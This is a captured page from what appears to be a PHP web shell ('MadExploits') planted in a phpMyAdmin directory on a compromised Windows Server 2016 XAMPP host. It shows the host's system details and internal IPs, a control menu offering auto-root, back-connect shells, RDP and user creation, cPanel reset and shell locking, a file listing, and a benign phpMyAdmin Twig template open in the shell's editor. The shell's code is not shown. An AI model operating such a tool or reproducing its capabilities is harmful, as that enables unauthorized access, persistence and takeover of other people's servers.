Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
templates /
table /
search /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
column_comparison_operators.tw...
161
B
-rw-rw-rw-
fields_table.twig
1.09
KB
-rw-rw-rw-
form_tag.twig
268
B
-rw-rw-rw-
geom_func.twig
707
B
-rw-rw-rw-
input_box.twig
4.07
KB
-rw-rw-rw-
replace_preview.twig
1.43
KB
-rw-rw-rw-
rows_normal.twig
1.49
KB
-rw-rw-rw-
rows_zoom.twig
2.7
KB
-rw-rw-rw-
selection_form.twig
8.65
KB
-rw-rw-rw-
zoom_result_form.twig
3.71
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rows_normal.twig
{% for column_index in 0..column_names|length - 1 %} <tr class="noclick"> {# If 'Function' column is present trying to change comment #} {% if geom_column_flag %} {% include 'table/search/geom_func.twig' with { 'column_index': column_index, 'column_types': column_types } only %} {% endif %} {# Displays column's name, type, collation and value #} <th> {{ column_names[column_index] }} </th> {% set properties = self.getColumnProperties(column_index, column_index) %} <td dir="ltr"> {{ properties['type'] }} </td> <td> {{ properties['collation'] }} </td> <td> {{ properties['func']|raw }} </td> {# here, the data-type attribute is needed for a date/time picker #} <td data-type="{{ properties['type'] }}"> {{ properties['value']|raw }} {# Displays hidden fields #} <input type="hidden" name="criteriaColumnNames[{{ column_index }}]" value="{{ column_names[column_index] }}"> <input type="hidden" name="criteriaColumnTypes[{{ column_index }}]" value="{{ column_types[column_index] }}"> <input type="hidden" name="criteriaColumnCollations[{{ column_index }}]" value="{{ column_collations[column_index] }}"> </td> </tr> {% endfor %}
Close